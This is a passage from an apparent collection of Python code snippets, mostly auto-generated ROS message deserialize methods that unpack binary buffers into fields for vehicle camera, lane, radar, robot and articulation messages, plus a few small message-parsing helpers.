_x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera.camera_numobstacles, _x.camera.VehSpeed,) = _get_struct_id().unpack(str[start:end])\n self.camera_obj = []\n for i in range(0, 10):\n val1 = vehicle_msgs.msg.Camera_Obj()\n _v9 = val1.header\n start = end\n end += 4\n (_v9.seq,) = _get_struct_I().unpack(str[start:end])\n _v10 = _v9.stamp\n _x = _v10\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v9.frame_id = str[start:end].decode('utf-8')\n else:\n _v9.frame_id = str[start:end]\n start = end\n end += 4\n (val1.messageID,) = _get_struct_i().unpack(str[start:end])\n _v11 = val1.localStamp\n _v12 = _v11.header\n start = end\n end += 4\n (_v12.seq,) = _get_struct_I().unpack(str[start:end])\n _v13 = _v12.stamp\n _x = _v13\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v12.frame_id = str[start:end].decode('utf-8')\n else:\n _v12.frame_id = str[start:end]\n _x = _v11\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v11.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v11.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v11.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v11.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _v14 = val1.globalStamp\n _v15 = _v14.header\n start = end\n end += 4\n (_v15.seq,) = _get_struct_I().unpack(str[start:end])\n _v16 = _v15.stamp\n _x = _v16\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v15.frame_id = str[start:end].decode('utf-8')\n else:\n _v15.frame_id = str[start:end]\n _x = _v14\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v14.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v14.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v14.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v14.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = val1\n start = end\n end += 136\n (_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle,) = _get_struct_i2d6i3d3i2d2ididid().unpack(str[start:end])\n self.camera_obj.append(val1)\n _x = self\n start = end\n end += 12\n (_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 404\n (_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version,) = _get_struct_2i3did19i3did21i3did7i3did7i4di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 6\n (_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion,) = _struct_B4bB.unpack(str[start:end])\n self.sbpl_wait_flag = bool(self.sbpl_wait_flag)\n self.start_P3DX_motion = bool(self.start_P3DX_motion)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.vehicle_id is None:\n self.vehicle_id = opil_v2.msg.Id()\n if self.action_capability is None:\n self.action_capability = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vendor = str[start:end].decode('utf-8')\n else:\n self.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 12\n (_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8,) = _struct_12B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts,) = _struct_9B.unpack(str[start:end])\n self.dvl_sts = bool(self.dvl_sts)\n self.svs_sts = bool(self.svs_sts)\n self.fog_sts = bool(self.fog_sts)\n self.nav_sts = bool(self.nav_sts)\n self.bat_sts = bool(self.bat_sts)\n self.t_sts = bool(self.t_sts)\n self.h_sts = bool(self.h_sts)\n self.p_sts = bool(self.p_sts)\n self.water_sts = bool(self.water_sts)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.pose is None:\n self.pose = geometry_msgs.msg.PoseWithCovariance()\n end = 0\n _x = self\n start = end\n end += 72\n (_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w,) = _get_struct_Q8d().unpack(str[start:end])\n start = end\n end += 288\n self.pose.covariance = _get_struct_36d().unpack(str[start:end])\n _x = self\n start = end\n end += 40\n (_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h,) = _get_struct_5d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.modality = str[start:end].decode('utf-8')\n else:\n self.modality = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.embed_vector = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 24\n (_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered,) = _struct_3B4IH3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.model_aligned is None:\n self.model_aligned = articulation_msgs.msg.ModelMsg()\n if self.data_aligned is None:\n self.data_aligned = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.name = str[start:end].decode('utf-8')\n else:\n self.model_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v71 = val1.position\n _x = _v71\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v72 = val1.orientation\n _x = _v72\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v73 = val1.stamp\n _x = _v73\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v74 = val1.position\n _x = _v74\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v75 = val1.orientation\n _x = _v75\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v76 = val1.position\n _x = _v76\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v77 = val1.orientation\n _x = _v77\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.model_aligned.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.name = str[start:end].decode('utf-8')\n else:\n self.data_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v78 = val1.position\n _x = _v78\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v79 = val1.orientation\n _x = _v79\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v80 = val1.stamp\n _x = _v80\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v81 = val1.position\n _x = _v81\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v82 = val1.orientation\n _x = _v82\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v83 = val1.position\n _x = _v83\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v84 = val1.orientation\n _x = _v84\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.data_aligned.track.channels.append(val1)\n start = end\n end += 72\n self.R = _struct_9d.unpack(str[start:end])\n start = end\n end += 24\n self.T = _struct_3d.unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.dist_rot, _x.dist_trans,) = _struct_df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 32\n (_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left,) = _struct_didid.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_left_sensor = str[start:end]\n start = end\n end += 8\n (self.turn_right,) = _struct_d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_right_sensor = str[start:end]\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def __parse_message_as(msg_type: type, msg_str: str) -> Any:\n # parse the message\n msg_dict = json.loads(msg_str)\n\n # the type specified in the message needs to match\n # the type we are parsing as\n assert msg_dict[MSG_TYPE_NAME] == msg_type.__name__, \\\n f\"Message type did not match the parsing type,\" \\\n f\"parsing the message as type {msg_type.__name__},\" \\\n f\"but get a message of type {msg_dict[MSG_TYPE_NAME]}\"\n\n # remove the message type information, and create the object\n del msg_dict[MSG_TYPE_NAME]\n return msg_type(**msg_dict)", "def from_msg(cls, msg):\n if cls._debug:\n log.debug('msg=%s', msg)\n key, seq_s, uuid, prop_s, body = msg\n key = key if key else None\n seq = struct.unpack('!q', seq_s)[0]\n body = body if body else None\n if body:\n body = pipeline.load(body)\n #body = json.loads(body_s)\n #prop = json.loads(prop_s)\n prop = pipeline.load(prop_s)\n return cls(seq, uuid=uuid, key=key, properties=prop, body=body)", "def unpack(self, raw_message):\n return self._msg_struct.unpack(raw_message)", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno,) = _struct_14id2i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.canmsg = str[start:end].decode('utf-8')\n else:\n self.canmsg = str[start:end]\n _x = self\n start = end\n end += 30\n (_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate,) = _get_struct_Bf2B2f2B2fBf().unpack(str[start:end])\n self.track_group_changed = bool(self.track_group_changed)\n self.track_bridge_object = bool(self.track_bridge_object)\n self.track_rolling_count = bool(self.track_rolling_count)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 1\n (self.type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model = str[start:end].decode('utf-8')\n else:\n self.model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.head_version = str[start:end].decode('utf-8')\n else:\n self.head_version = str[start:end]\n start = end\n 